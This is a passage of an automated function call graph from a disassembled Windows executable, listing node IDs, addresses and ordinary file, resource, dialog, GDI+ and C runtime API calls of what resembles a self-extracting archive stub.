8 API calls 24359 cc8bd1 24356->24359 24358->24348 24623 cc7db2 101 API calls 24358->24623 24362 ccab1a 8 API calls 24359->24362 24376 cc8be7 24362->24376 24365 cc8b70 24629 cc6e98 77 API calls 24365->24629 24367->24356 24368 cc8cbc 24369 cc8d18 24368->24369 24370 cc8e40 24368->24370 24371 cc8d8a 24369->24371 24372 cc8d28 24369->24372 24373 cc8e66 24370->24373 24374 cc8e52 24370->24374 24393 cc8d49 24370->24393 24381 cc8167 19 API calls 24371->24381 24377 cc8d6e 24372->24377 24385 cc8d37 24372->24385 24375 cd3377 75 API calls 24373->24375 24378 cc9215 123 API calls 24374->24378 24379 cc8e7f 24375->24379 24376->24368 24380 cc8c93 24376->24380 24387 cc981a 79 API calls 24376->24387 24377->24393 24632 cc77b8 111 API calls 24377->24632 24378->24393 24635 cd3020 123 API calls 24379->24635 24380->24368 24630 cc9a3c 82 API calls 24380->24630 24384 cc8dbd 24381->24384 24389 cc8df5 24384->24389 24390 cc8de6 24384->24390 24384->24393 24631 cc2021 74 API calls 24385->24631 24387->24380 24634 cc9155 93 API calls __EH_prolog 24389->24634 24633 cc7542 85 API calls 24390->24633 24397 cc8f85 24393->24397 24636 cc2021 74 API calls 24393->24636 24395 cca4ed 3 API calls 24398 cc90eb 24395->24398 24396 cc903e 24611 cc9da2 24396->24611 24397->24347 24397->24396 24405 cc9090 24397->24405 24610 cc9f09 SetEndOfFile 24397->24610 24398->24347 24637 cc2021 74 API calls 24398->24637 24401 cc9085 24403 cc9620 77 API calls 24401->24403 24403->24405 24404 cc90fb 24638 cc6dcb 76 API calls 24404->24638 24405->24347 24405->24395 24408 cc16a4 24407->24408 24654 cccee1 24408->24654 24412 cc9f59 24411->24412 24413 cc9f63 24412->24413 24662 cc6d0c 78 API calls 24412->24662 24413->24246 24415->24257 24416->24256 24431 cc1732 24417->24431 24419 cc13d6 24420 cc9e80 24419->24420 24421 cc9e92 24420->24421 24424 cc9ea5 24420->24424 24425 cc9eb0 24421->24425 24448 cc6d5b 77 API calls 24421->24448 24422 cc9eb8 SetFilePointer 24422->24425 24426 cc9ed4 GetLastError 24422->24426 24424->24422 24424->24425 24425->24292 24426->24425 24427 cc9ede 24426->24427 24427->24425 24449 cc6d5b 77 API calls 24427->24449 24429->24295 24430->24291 24432 cc1748 24431->24432 24443 cc17a0 __InternalCxxFrameHandler 24431->24443 24433 cc1771 24432->24433 24444 cc6c36 76 API calls __vswprintf_c_l 24432->24444 24434 cc17c7 24433->24434 24440 cc178d ___std_exception_copy 24433->24440 24436 ce3e3e 22 API calls 24434->24436 24439 cc17ce 24436->24439 24437 cc1767 24445 cc6ca7 75 API calls 24437->24445 24439->24443 24447 cc6ca7 75 API calls 24439->24447 24440->24443 24446 cc6ca7 75 API calls 24440->24446 24443->24419 24444->24437 24445->24433 24446->24443 24447->24443 24448->24424 24449->24425 24451 cccf4d 24450->24451 24453 cccf54 24450->24453 24455 cc981a 24451->24455 24453->24300 24454->24302 24456 cc9833 24455->24456 24458 cc9e80 79 API calls 24456->24458 24457 cc9865 24457->24453 24458->24457 24460 cc19bf 24459->24460 24462 cc19bb 24459->24462 24463 cc18f6 24460->24463 24462->24306 24464 cc1908 24463->24464 24465 cc1945 24463->24465 24466 cc3b2d 101 API calls 24464->24466 24471 cc3fa3 24465->24471 24469 cc1928 24466->24469 24469->24462 24472 cc3fac 24471->24472 24473 cc3b2d 101 API calls 24472->24473 24475 cc1966 24472->24475 24488 cd0e08 24472->24488 24473->24472 24475->24469 24476 cc1e50 24475->24476 24477 cc1e5a __EH_prolog 24476->24477 24496 cc3bba 24477->24496 24479 cc1e84 24480 cc1732 78 API calls 24479->24480 24482 cc1f0b 24479->24482 24481 cc1e9b 24480->24481 24524 cc18a9 78 API calls 24481->24524 24482->24469 24484 cc1eb3 24486 cc1ebf _wcslen 24484->24486 24525 cd1b84 MultiByteToWideChar 24484->24525 24526 cc18a9 78 API calls 24486->24526 24489 cd0e0f 24488->24489 24492 cd0e2a 24489->24492 24494 cc6c31 RaiseException CallUnexpected 24489->24494 24491 cd0e3b SetThreadExecutionState 24491->24472 24492->24491 24495 cc6c31 RaiseException CallUnexpected 24492->24495 24494->24492 24495->24491 24497 cc3bc4 __EH_prolog 24496->24497 24498 cc3bda 24497->24498 24499 cc3bf6 24497->24499 24552 cc138b 74 API calls 24498->24552 24501 cc3e51 24499->24501 24504 cc3c22 24499->24504 24569 cc138b 74 API calls 24501->24569 24503 cc3be5 24503->24479 24504->24503 24527 cd3377 24504->24527 24506 cc3ca3 24507 cc3d2e 24506->24507 24523 cc3c9a 24506->24523 24555 ccd051 24506->24555 24537 ccab1a 24507->24537 24508 cc3c9f 24508->24506 24554 cc20bd 78 API calls 24508->24554 24510 cc3c8f 24553 cc138b 74 API calls 24510->24553 24511 cc3c71 24511->24506 24511->24508 24511->24510 24514 cc3d41 24517 cc3dd7 24514->24517 24518 cc3dc7 24514->24518 24561 cd3020 123 API calls 24517->24561 24541 cc9215 24518->24541 24521 cc3dd5 24521->24523 24562 cc2021 74 API calls 24521->24562 24563 cd2297 24523->24563 24524->24484 24525->24486 24526->24482 24528 cd338c 24527->24528 24530 cd3396 ___std_exception_copy 24527->24530 24570 cc6ca7 75 API calls 24528->24570 24531 cd34c6 24530->24531 24532 cd341c 24530->24532 24536 cd3440 __cftof 24530->24536 24572 ce238d RaiseException 24531->24572 24571 cd32aa 75 API calls 3 library calls 24532->24571 24535 cd34f2 24536->24511 24538 ccab28 24537->24538 24540 ccab32 24537->24540 24539 cdeb38 8 API calls 24538->24539 24539->24540 24540->24514 24542 cc921f __EH_prolog 24541->24542 24573 cc7c64 24542->24573 24545 cc13ba 78 API calls 24546 cc9231 24545->24546 24576 ccd114 24546->24576 24548 cc928a 24548->24521 24550 ccd114 118 API calls 24551 cc9243 24550->24551 24551->24548 24551->24550 24585 ccd300 97 API calls __InternalCxxFrameHandler 24551->24585 24552->24503 24553->24523 24554->24506 24556 ccd084 24555->24556 24557 ccd072 24555->24557 24587 cc603a 82 API calls 24556->24587 24586 cc603a 82 API calls 24557->24586 24560 ccd07c 24560->24507 24561->24521 24562->24523 24564 cd22a1 24563->24564 24565 cd22ba 24564->24565 24568 cd22ce 24564->24568 24588 cd0eed 86 API calls 24565->24588 24567 cd22c1 24567->24568 24569->24503 24570->24530 24571->24536 24572->24535 24574 ccb146 GetVersionExW 24573->24574 24575 cc7c69 24574->24575 24575->24545 24581 ccd12a __InternalCxxFrameHandler 24576->24581 24577 ccd29a 24578 ccd2ce 24577->24578 24579 ccd0cb 6 API calls 24577->24579 24580 cd0e08 SetThreadExecutionState RaiseException 24578->24580 24579->24578 24583 ccd291 24580->24583 24581->24577 24582 cd8c8d 103 API calls 24581->24582 24581->24583 24584 ccac05 91 API calls 24581->24584 24582->24581 24583->24551 24584->24581 24585->24551 24586->24560 24587->24560 24588->24567 24589->24316 24590->24316 24591->24314 24593 cc5d2a 24592->24593 24639 cc5c4b 24593->24639 24596 cc5d5d 24597 cc5d95 24596->24597 24644 ccb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 24596->24644 24597->24331 24599 cc8186 24598->24599 24600 cc8232 24599->24600 24651 ccbe5e 19 API calls __InternalCxxFrameHandler 24599->24651 24650 cd1fac CharUpperW 24600->24650 24603 cc823b 24603->24334 24605 cc7c22 24604->24605 24606 cc7c5a 24605->24606 24652 cc6e7a 74 API calls 24605->24652 24606->24344 24608 cc7c52 24653 cc138b 74 API calls 24608->24653 24610->24396 24612 cc9db3 24611->24612 24614 cc9dc2 24611->24614 24613 cc9db9 FlushFileBuffers 24612->24613 24612->24614 24613->24614 24615 cc9e3f SetFileTime 24614->24615 24615->24401 24616->24323 24617->24330 24618->24330 24619->24344 24620->24344 24621->24340 24622->24353 24623->24348 24624->24353 24626 cc98c5 GetFileType 24625->24626 24627 cc8b5a 24625->24627 24626->24627 24627->24367 24628 cc2021 74 API calls 24627->24628 24628->24365 24629->24367 24630->24368 24631->24393 24632->24393 24633->24393 24634->24393 24635->24393 24636->24397 24637->24404 24638->24347 24645 cc5b48 24639->24645 24642 cc5c6c 24642->24596 24643 cc5b48 2 API calls 24643->24642 24644->24596 24647 cc5b52 24645->24647 24646 cc5c3a 24646->24642 24646->24643 24647->24646 24649 ccb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 24647->24649 24649->24647 24650->24603 24651->24600 24652->24608 24653->24606 24655 cccef2 24654->24655 24660 cca99e 86 API calls 24655->24660 24657 cccf24 24661 cca99e 86 API calls 24657->24661 24659 cccf2f 24660->24657 24661->24659 24662->24413 24664 cca6a8 24663->24664 24665 cca727 FindNextFileW 24664->24665 24666 cca6c1 FindFirstFileW 24664->24666 24667 cca732 GetLastError 24665->24667 24673 cca709 24665->24673 24668 cca6d0 24666->24668 24666->24673 24667->24673 24669 ccbb03 GetCurrentDirectoryW 24668->24669 24670 cca6e0 24669->24670 24671 cca6fe GetLastError 24670->24671 24672 cca6e4 FindFirstFileW 24670->24672 24671->24673 24672->24671 24672->24673 24673->24267 24683 cda5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24674->24683 24676 cda5cd 24677 cda5d9 24676->24677 24684 cda605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24676->24684 24677->24068 24677->24069 24679->24072 24680->24078 24681->24078 24682->24081 24683->24676 24684->24677 24685->24087 24687 cc9f42 78 API calls 24686->24687 24688 cc1fe8 24687->24688 24689 cc1a04 101 API calls 24688->24689 24692 cc2005 24688->24692 24690 cc1ff5 24689->24690 24690->24692 24693 cc138b 74 API calls 24690->24693 24692->24095 24692->24096 24693->24692 24694 cc13e1 84 API calls 2 library calls 25413 cd94e0 GetClientRect 25414 cdf2e0 46 API calls __RTC_Initialize 25465 cd21e0 26 API calls std::bad_exception::bad_exception 25415 cebee0 GetCommandLineA GetCommandLineW 25416 ce2cfb 38 API calls 4 library calls 25418 cc5ef0 82 API calls 25466 cc95f0 80 API calls 25467 cdfd4f 9 API calls 2 library calls 24717 ce98f0 24725 ceadaf 24717->24725 24721 ce990c 24722 ce9919 24721->24722 24733 ce9920 11 API calls 24721->24733 24724 ce9904 24734 ceac98 24725->24734 24728 ceadee TlsAlloc 24731 ceaddf 24728->24731 24729 cdfbbc CatchGuardHandler 5 API calls 24730 ce98fa 24729->24730 24730->24724 24732 ce9869 20 API calls 2 library calls 24730->24732 24731->24729 24732->24721 24733->24724 24735 ceacc8 24734->24735 24739 ceacc4 24734->24739 24735->24728 24735->24731 24736 ceace8 24736->24735 24738 ceacf4 GetProcAddress 24736->24738 24740 cead04 _unexpected 24738->24740 24739->24735 24739->24736 24741 cead34 24739->24741 24740->24735 24742 cead4a 24741->24742 24743 cead55 LoadLibraryExW 24741->24743 24742->24739 24744 cead72 GetLastError 24743->24744 24747 cead8a 24743->24747 24745 cead7d LoadLibraryExW 24744->24745 24744->24747 24745->24747 24746 ceada1 FreeLibrary 24746->24742 24747->24742 24747->24746 24749 ceabf0 24750 ceabfb 24749->24750 24752 ceac24 24750->24752 24753 ceac20 24750->24753 24755 ceaf0a 24750->24755 24762 ceac50 DeleteCriticalSection 24752->24762 24756 ceac98 _unexpected 5 API calls 24755->24756 24757 ceaf31 24756->24757 24758 ceaf4f InitializeCriticalSectionAndSpinCount 24757->24758 24759 ceaf3a 24757->24759 24758->24759 24760 cdfbbc CatchGuardHandler 5 API calls 24759->24760 24761 ceaf66 24760->24761 24761->24750 24762->24753 25419 ce88f0 7 API calls ___scrt_uninitialize_crt 25469 cdb18d 78 API calls 25420 cdc793 97 API calls 4 library calls 25422 cdc793 102 API calls 4 library calls 25472 cd9580 6 API calls 25475 cc6faa 111 API calls 3 library calls 25476 cdeda7 48 API calls _unexpected 25424 cddca1 DialogBoxParamW 25477 cdf3a0 27 API calls 25427 cea4a0 71 API calls _free 25428 cf08a0 IsProcessorFeaturePresent 25478 cd1bbd GetCPInfo IsDBCSLeadByte 25479 ceb1b8 27 API calls 3 library calls 25480 cdb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24916 cdf3b2 24917 cdf3be __FrameHandler3::FrameUnwindToState 24916->24917 24948 cdeed7 24917->24948 24919 cdf3c5 24920 cdf518 24919->24920 24924 cdf3ef 24919->24924 25021 cdf838 4 API calls 2 library calls 24920->25021 24922 cdf51f 25014 ce7f58 24922->25014 24936 cdf42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24924->24936 24959 ce8aed 24924->24959 24930 cdf40e 24932 cdf48f 24967 cdf953 GetStartupInfoW __cftof 24932->24967 24934 cdf495 24968 ce8a3e 51 API calls 24934->24968 24936->24932 25017 ce7af4 38 API calls 2 library calls 24936->25017 24937 cdf49d 24969 cddf1e 24937->24969 24942 cdf4b1 24942->24922 24943 cdf4b5 24942->24943 24944 cdf4be 24943->24944 25019 ce7efb 28 API calls _abort 24943->25019 25020 cdf048 12 API calls ___scrt_uninitialize_crt 24944->25020 24947 cdf4c6 24947->24930 24949 cdeee0 24948->24949 25023 cdf654 IsProcessorFeaturePresent 24949->25023 24951 cdeeec 25024 ce2a5e 24951->25024 24953 cdeef1 24958 cdeef5 24953->24958 25032 ce8977 24953->25032 24956 cdef0c 24956->24919 24958->24919 24960 ce8b04 24959->24960 24961 cdfbbc CatchGuardHandler 5 API calls 24960->24961 24962 cdf408 24961->24962 24962->24930 24963 ce8a91 24962->24963 24964 ce8ac0 24963->24964 24965 cdfbbc CatchGuardHandler 5 API calls 24964->24965 24966 ce8ae9 24965->24966 24966->24936 24967->24934 24968->24937 25125 cd0863 24969->25125 24973 cddf3d 25174 cdac16 24973->25174 24975 cddf46 __cftof 24976 cddf59 GetCommandLineW 24975->24976 24977 cddf68 24976->24977 24978 cddfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24976->24978 25178 cdc5c4 24977->25178 24979 cc4092 _swprintf 51 API calls 24978->24979 24981 cde04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24979->24981 25189 cdb6dd LoadBitmapW 24981->25189 24984 cddf76 OpenFileMappingW 24988 cddf8f MapViewOfFile 24984->24988 24989 cddfd6 CloseHandle 24984->24989 24985 cddfe0 25183 cddbde 24985->25183 24991 cddfcd UnmapViewOfFile 24988->24991 24992 cddfa0 __InternalCxxFrameHandler 24988->24992 24989->24978 24991->24989 24996 cddbde 2 API calls 24992->24996 24998 cddfbc 24996->24998 24997 cd90b7 8 API calls 24999 cde0aa DialogBoxParamW 24997->24999 24998->24991 25000 cde0e4 24999->25000 25001 cde0fd 25000->25001 25002 cde0f6 Sleep 25000->25002 25004 cde10b 25001->25004 25219 cdae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 25001->25219 25002->25001 25005 cde12a DeleteObject 25004->25005 25006 cde13f DeleteObject 25005->25006 25007 cde146 25005->25007 25006->25007 25008 cde189 25007->25008 25009 cde177 25007->25009 25216 cdac7c 25008->25216 25220 cddc3b 6 API calls 25009->25220 25011 cde17d CloseHandle 25011->25008 25013 cde1c3 25018 cdf993 GetModuleHandleW 25013->25018 25352 ce7cd5 25014->25352 25017->24932 25018->24942 25019->24944 25020->24947 25021->24922 25023->24951 25036 ce3b07 25024->25036 25027 ce2a67 25027->24953 25029 ce2a6f 25030 ce2a7a 25029->25030 25050 ce3b43 DeleteCriticalSection 25029->25050 25030->24953 25079 cec05a 25032->25079 25035 ce2a7d 7 API calls 2 library calls 25035->24958 25037 ce3b10 25036->25037 25039 ce3b39 25037->25039 25040 ce2a63 25037->25040 25051 ce3d46 25037->25051 25056 ce3b43 DeleteCriticalSection 25039->25056 25040->25027 25042 ce2b8c 25040->25042 25072 ce3c57 25042->25072 25046 ce2bbc 25046->25029 25047 ce2baf 25047->25046 25078 ce2bbf 6 API calls ___vcrt_FlsFree 25047->25078 25049 ce2ba1 25049->25029 25050->25027 25057 ce3c0d 25051->25057 25054 ce3d7e InitializeCriticalSectionAndSpinCount 25055 ce3d69 25054->25055 25055->25037 25056->25040 25058 ce3c26 25057->25058 25059 ce3c4f 25057->25059 25058->25059 25064 ce3b72 25058->25064 25059->25054 25059->25055 25062 ce3c3b GetProcAddress 25062->25059 25063 ce3c49 25062->25063 25063->25059 25070 ce3b7e ___vcrt_FlsGetValue 25064->25070 25065 ce3bf3 25065->25059 25065->25062 25066 ce3b95 LoadLibraryExW 25067 ce3bfa 25066->25067 25068 ce3bb3 GetLastError 25066->25068 25067->25065 25069 ce3c02 FreeLibrary 25067->25069 25068->25070 25069->25065 25070->25065 25070->25066 25071 ce3bd5 LoadLibraryExW 25070->25071 25071->25067 25071->25070 25073 ce3c0d ___vcrt_FlsGetValue 5 API calls 25072->25073 25074 ce3c71 25073->25074 25075 ce3c8a TlsAlloc 25074->25075 25076 ce2b96 25074->25076 25076->25049 25077 ce3d08 6 API calls ___vcrt_FlsGetValue 25076->25077 25077->25047 25078->25049 25080 cec077 25079->25080 25083 cec073 25079->25083 25080->25083 25085 cea6a0 25080->25085 25081 cdfbbc CatchGuardHandler 5 API calls 25082 cdeefe 25081->25082 25082->24956 25082->25035 25083->25081 25086 cea6ac __FrameHandler3::FrameUnwindToState 25085->25086 25097 ceac31 EnterCriticalSection 25086->25097 25088 cea6b3 25098 cec528 25088->25098 25090 cea6c2 25091 cea6d1 25090->25091 25111 cea529 29 API calls 25090->25111 25113 cea6ed LeaveCriticalSection _abort 25091->25113 25094 cea6cc 25112 cea5df GetStdHandle GetFileType 25094->25112 25095 cea6e2 _abort 25095->25080 25097->25088 25099 cec534 __FrameHandler3::FrameUnwindToState 25098->25099 25100 cec558 25099->25100 25101 cec541 25099->25101 25114 ceac31 EnterCriticalSection 25100->25114 25122 ce91a8 20 API calls __dosmaperr 25101->25122 25104 cec546 25123 ce9087 26 API calls __cftof 25104->25123 25106 cec550 _abort 25106->25090 25107 cec590 25124 cec5b7 LeaveCriticalSection _abort 25107->25124 25109 cec564 25109->25107 25115 cec479 25109->25115 25111->25094 25112->25091 25113->25095 25114->25109 25116 ceb136 _unexpected 20 API calls 25115->25116 25118 cec48b 25116->25118 25117 cec498 25119 ce8dcc _free 20 API calls 25117->25119 25118->25117 25120 ceaf0a 11 API calls 25118->25120 25121 cec4ea 25119->25121 25120->25118 25121->25109 25122->25104 25123->25106 25124->25106 25126 cdec50 25125->25126 25127 cd086d GetModuleHandleW 25126->25127 25128 cd0888 GetProcAddress 25127->25128 25129 cd08e7 25127->25129 25130 cd08b9 GetProcAddress 25128->25130 25131 cd08a1 25128->25131 25132 cd0c14 GetModuleFileNameW 25129->25132 25230 ce75fb 42 API calls __vsnwprintf_l 25129->25230 25135 cd08cb 25130->25135 25131->25130 25147 cd0c32 25132->25147 25134 cd0b54 25134->25132 25136 cd0b5f GetModuleFileNameW CreateFileW 25134->25136 25135->25129 25137 cd0b8f SetFilePointer 25136->25137 25138 cd0c08 CloseHandle 25136->25138 25137->25138 25139 cd0b9d ReadFile 25137->25139 25138->25132 25139->25138 25142 cd0bbb 25139->25142 25142->25138 25144 cd081b 2 API calls 25142->25144 25143 cd0c94 GetFileAttributesW 25146 cd0cac 25143->25146 25143->25147 25144->25142 25145 cd0c5d CompareStringW 25145->25147 25148 cd0cb7 25146->25148 25151 cd0cec 25146->25151 25147->25143 25147->25145 25147->25146 25221 ccb146 25147->25221 25224 cd081b 25147->25224 25150 cd0cd0 GetFileAttributesW 25148->25150 25152 cd0ce8 25148->25152 25149 cd0dfb 25173 cda64d GetCurrentDirectoryW 25149->25173 25150->25148 25150->25152 25151->25149 25153 ccb146 GetVersionExW 25151->25153 25152->25151 25154 cd0d06 25153->25154 25155 cd0d0d 25154->25155 25156 cd0d73 25154->25156 25158 cd081b 2 API calls 25155->25158 25157 cc4092 _swprintf 51 API calls 25156->25157 25159 cd0d9b AllocConsole 25157->25159 25160 cd0d17 25158->25160 25161 cd0da8 GetCurrentProcessId AttachConsole 25159->25161 25162 cd0df3 ExitProcess 25159->25162 25163 cd081b 2 API calls 25160->25163 25231 ce3e13 25161->25231 25165 cd0d21 25163->25165 25167 cce617 53 API calls 25165->25167 25166 cd0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25166->25162 25168 cd0d3c 25167->25168 25169 cc4092 _swprintf 51 API calls 25168->25169 25170 cd0d4f 25169->25170 25171 cce617 53 API calls 25170->25171 25172 cd0d5e 25171->25172 25172->25162 25173->24973 25175 cd081b 2 API calls 25174->25175 25176 cdac2a OleInitialize 25175->25176 25177 cdac4d GdiplusStartup SHGetMalloc 25176->25177 25177->24975 25181 cdc5ce 25178->25181 25179 cdc6e4 25179->24984 25179->24985 25180 cd1fac CharUpperW 25180->25181 25181->25179 25181->25180 25233 ccf3fa 82 API calls 2 library calls 25181->25233 25184 cdec50 25183->25184 25185 cddbeb SetEnvironmentVariableW 25184->25185 25187 cddc0e 25185->25187 25186 cddc36 25186->24978 25187->25186 25188 cddc2a SetEnvironmentVariableW 25187->25188 25188->25186 25190 cdb6fe 25189->25190 25191 cdb70b GetObjectW 25189->25191 25234 cda6c2 FindResourceW 25190->25234 25192 cdb71a 25191->25192 25194 cda5c6 4 API calls 25192->25194 25196 cdb72d 25194->25196 25197 cdb770 25196->25197 25198 cdb74c 25196->25198 25199 cda6c2 13 API calls 25196->25199 25208 ccda42 25197->25208 25250 cda605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25198->25250 25201 cdb73d 25199->25201 25201->25198 25203 cdb743 DeleteObject 25201->25203 25202 cdb754 25251 cda5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25202->25251 25203->25198 25205 cdb75d 25252 cda80c 8 API calls 25205->25252 25207 cdb764 DeleteObject 25207->25197 25261 ccda67 25208->25261 25213 cd90b7 25214 cdeb38 8 API calls 25213->25214 25215 cd90d6 25214->25215 25215->24997 25217 cdacab GdiplusShutdown CoUninitialize 25216->25217 25217->25013 25219->25004 25220->25011 25222 ccb15a GetVersionExW 25221->25222 25223 ccb196 25221->25223 25222->25223 25223->25147 25225 cdec50 25224->25225 25226 cd0828 GetSystemDirectoryW 25225->25226 25227 cd085e 25226->25227 25228 cd0840 25226->25228 25227->25147 25229 cd0851 LoadLibraryW 25228->25229 25229->25227 25230->25134 25232 ce3e1b 25231->25232 25232->25166 25232->25232 25233->25181 25235 cda7d3 25234->25235 25236 cda6e5 SizeofResource 25234->25236 25235->25191 25235->25192 25236->25235 25237 cda6fc LoadResource 25236->25237 25237->25235 25238 cda711 LockResource 25237->25238 25238->25235 25239 cda722 GlobalAlloc 25238->25239 25239->25235 25240 cda73d GlobalLock 25239->25240 25241 cda7cc GlobalFree 25240->25241 25242 cda74c __InternalCxxFrameHandler 25240->25242 25241->25235 25243 cda754 CreateStreamOnHGlobal 25242->25243 25244 cda76c 25243->25244 25245 cda7c5 GlobalUnlock 25243->25245 25253 cda626 GdipAlloc 25244->25253 25245->25241 25248 cda79a GdipCreateHBITMAPFromBitmap 25249 cda7b0 25248->25249 25249->25245 25250->25202 25251->25205 25252->25207 25254 cda638 25253->25254 25255 cda645 25253->25255 25257 cda3b9 25254->25257 25255->25245 25255->25248 25255->25249 25258 cda3da GdipCreateBitmapFromStreamICM 25257->25258 25259 cda3e1 GdipCreateBitmapFromStream 25257->25259 25260 cda3e6 25258->25260 25259->25260 25260->25255 25262 ccda75 __EH_prolog 25261->25262 25263 ccdaa4 GetModuleFileNameW 25262->25263 25264 ccdad5 25262->25264 25265 ccdabe 25263->25265 25307 cc98e0 25264->25307 25265->25264 25267 ccdb31 25318 ce6310 25267->25318 25268 cc959a 80 API calls 25271 ccda4e 25268->25271 25270 cce261 78 API calls 25273 ccdb05 25270->25273 25305 cce29e GetModuleHandleW FindResourceW 25271->25305 25272 ccdb44 25274 ce6310 26 API calls 25272->25274 25273->25267 25273->25270 25285 ccdd4a 25273->25285 25282 ccdb56 ___vcrt_FlsGetValue 25274->25282 25275 ccdc85 25275->25285 25338 cc9d70 81 API calls 25275->25338 25277 cc9e80 79 API calls 25277->25282 25279 ccdc9f ___std_exception_copy 25280 cc9bd0 82 API calls 25279->25280 25279->25285 25283 ccdcc8 ___std_exception_copy 25280->25283 25282->25275 25282->25277 25282->25285 25332 cc9bd0 25282->25332 25337 cc9d70 81 API calls 25282->25337 25283->25285 25302 ccdcd3 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 25283->25302 25339 cd1b84 MultiByteToWideChar 25283->25339 25285->25268 25286 cce159 25290 cce1de 25286->25290 25345 ce8cce 26 API calls 2 library calls 25286->25345 25288 cce16e 25346 ce7625 26 API calls 2 library calls 25288->25346 25291 cce214 25290->25291 25295 cce261 78 API calls 25290->25295 25296 ce6310 26 API calls 25291->25296 25293 cce1c6 25347 cce27c 78 API calls 25293->25347 25295->25290 25297 cce22d 25296->25297 25298 ce6310 26 API calls 25297->25298 25298->25285 25301 cd1da7 WideCharToMultiByte 25301->25302 25302->25285 25302->25286 25302->25301 25340 cce5b1 50 API calls __vsnprintf 25302->25340 25341 ce6159 26 API calls 3 library calls 25302->25341 25342 ce8cce 26 API calls 2 library calls 25302->25342 25343 ce7625 26 API calls 2 library calls 25302->25343 25344 cce27c 78 API calls 25302->25344 25306 ccda55 25305->25306 25306->25213 25309 cc98ea 25307->25309 25308 cc994b CreateFileW 25310 cc996c GetLastError 25308->25310 25313 cc99bb 25308->25313 25309->25308 25311 ccbb03 GetCurrentDirectoryW 25310->25311 25312 cc998c 25311->25312 25312->25313 25314 cc9990 CreateFileW GetLastError 25312->25314 25315 cc99ff 25313->25315 25317 cc99e5 SetFileTime 25313->25317 25314->25313 25316 cc99b5 25314->25316 25315->25273 25316->25313 25317->25315 25319 ce6349 25318->25319 25320 ce634d 25319->25320 25331 ce6375 25319->25331 25348 ce91a8 20 API calls __dosmaperr 25320->25348 25322 ce6699 25324 cdfbbc CatchGuardHandler 5 API calls 25322->25324 25323 ce6352 25349 ce9087 26 API calls __cftof 25323->25349 25326 ce66a6 25324->25326 25326->25272 25327 ce635d 25328 cdfbbc CatchGuardHandler 5 API calls 25327->25328 25330 ce6369 25328->25330 25330->25272 25331->25322 25350 ce6230 5 API calls CatchGuardHandler 25331->25350 25333 cc9bdc 25332->25333 25335 cc9be3 25332->25335 25333->25282 25335->25333 25336 cc9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25335->25336 25351 cc6d1a 77 API calls 25335->25351 25336->25335 25337->25282 25338->25279 25339->25302 25340->25302 25341->25302 25342->25302 25343->25302 25344->25302 25345->25288 25346->25293 25347->25290 25348->25323 25349->25327 25350->25331 25351->25335 25353 ce7ce1 _unexpected 25352->25353 25354 ce7cfa 25353->25354 25355 ce7ce8 25353->25355 25376 ceac31 EnterCriticalSection 25354->25376 25388 ce7e2f GetModuleHandleW 25355->25388 25358 ce7ced 25358->25354 25389 ce7e73 GetModuleHandleExW 25358->25389 25359 ce7d9f 25377 ce7ddf 25359->25377 25363 ce7d76 25368 ce7d8e 25363->25368 25373 ce8a91 _abort 5 API calls 25363->25373 25365 ce7d01 25365->25359 25365->25363 25397 ce87e0 20 API calls _abort 25365->25397 25366 ce7dbc 25380 ce7dee 25366->25380 25367 ce7de8 25398 cf2390 5 API calls CatchGuardHandler 25367->25398 25369 ce8a91 _abort 5 API calls 25368->25369 25369->25359 25373->25368 25376->25365 25399 ceac81 LeaveCriticalSection 25377->25399 25379 ce7db8 25379->25366 25379->25367 25400 ceb076 25380->25400 25383 ce7e1c 25385 ce7e73 _abort 8 API calls 25383->25385 25384 ce7dfc GetPEB 25384->25383 25386 ce7e0c GetCurrentProcess TerminateProcess 25384->25386 25387 ce7e24 ExitProcess 25385->25387 25386->25383 25388->25358 25390 ce7e9d GetProcAddress 25389->25390 25391 ce7ec0 25389->25391 25394 ce7eb2 25390->25394 25392 ce7ecf 25391->25392 25393 ce7ec6 FreeLibrary 25391->25393 25395 cdfbbc CatchGuardHandler 5 API calls 25392->25395 25393->25392 25394->25391 25396 ce7cf9 25395->25396 25396->25354 25397->25363 25399->25379 25401 ceb09b 25400->25401 25405 ceb091 25400->25405 25402 ceac98 _unexpected 5 API calls 25401->25402 25402->25405 25403 cdfbbc CatchGuardHandler 5 API calls 25404 ce7df8 25403->25404 25404->25383 25404->25384 25405->25403 23476 cde44b 23477 cde3f4 23476->23477 23479 cde85d 23477->23479 23505 cde5bb 23479->23505 23481 cde86d 23482 cde8ca 23481->23482 23493 cde8ee 23481->23493 23483 cde7fb DloadReleaseSectionWriteAccess 6 API calls 23482->23483 23484 cde8d5 RaiseException 23483->23484 23498 cdeac3 23484->23498 23485 cde9d9 23489 cdea95 23485->23489 23492 cdea37 GetProcAddress 23485->23492 23486 cde966 LoadLibraryExA 23487 cde979 GetLastError 23486->23487 23488 cde9c7 23486->23488 23491 cde9a2 23487->23491 23502 cde98c 23487->23502 23488->23485 23490 cde9d2 FreeLibrary 23488->23490 23514 cde7fb 23489->23514 23490->23485 23494 cde7fb DloadReleaseSectionWriteAccess 6 API calls 23491->23494 23492->23489 23495 cdea47 GetLastError 23492->23495 23493->23485 23493->23486 23493->23488 23493->23489 23496 cde9ad RaiseException 23494->23496 23500 cdea5a 23495->23500 23496->23498 23498->23477 23499 cde7fb DloadReleaseSectionWriteAccess 6 API calls 23501 cdea7b RaiseException 23499->23501 23500->23489 23500->23499 23503 cde5bb ___delayLoadHelper2@8 6 API calls 23501->23503 23502->23488 23502->23491 23504 cdea92 23503->23504 23504->23489 23506 cde5ed 23505->23506 23507 cde5c7 23505->23507 23506->23481 23522 cde664 23507->23522 23509 cde5cc 23510 cde5e8 23509->23510 23525 cde78d 23509->23525 23530 cde5ee GetModuleHandleW GetProcAddress GetProcAddress 23510->23530 23513 cde836 23513->23481 23515 cde80d 23514->23515 23516 cde82f 23514->23516 23517 